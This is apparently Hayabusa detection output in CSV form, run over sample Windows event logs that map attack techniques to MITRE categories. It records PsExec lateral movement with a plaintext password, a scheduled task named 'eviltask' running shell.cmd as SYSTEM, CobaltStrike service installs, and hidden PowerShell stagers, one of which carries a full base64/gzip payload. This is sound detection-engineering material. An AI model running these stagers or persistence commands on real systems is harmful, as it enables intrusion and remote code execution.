2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: cmd.exe | IP Addr: 10.23.42.22 | LID: 0x1375fbd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:40:32.531 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""cmd.exe"" -u demo\admmig -p Admin1235 -accepteula | Path: C:\Windows\cmd.exe | PID: 0x15d4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:41:03.008 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x590 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:42:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1050 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 18:43:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf90 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx"
2021-04-21 22:30:00.569 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\schtasks.exe"" /create /sc minute /mo 1 /tn eviltask /tr C:\tools\shell.cmd /ru SYSTEM | Path: C:\Windows\System32\schtasks.exe | PID: 0x15b4 | User: admmig | LID: 0x6fc89e",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx
2021-04-21 22:30:03.012 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x2ac | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-4698 Persistent scheduled task with SYSTEM privileges creation.evtx
2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx
2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x1659379,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,Exec,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx
2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
2021-04-21 23:56:43.246 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb
9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1510 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:43.280 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134J
VR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:56:46.597 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:57:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:58:03.005 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-21 23:59:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx 2021-04-22 00:00:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 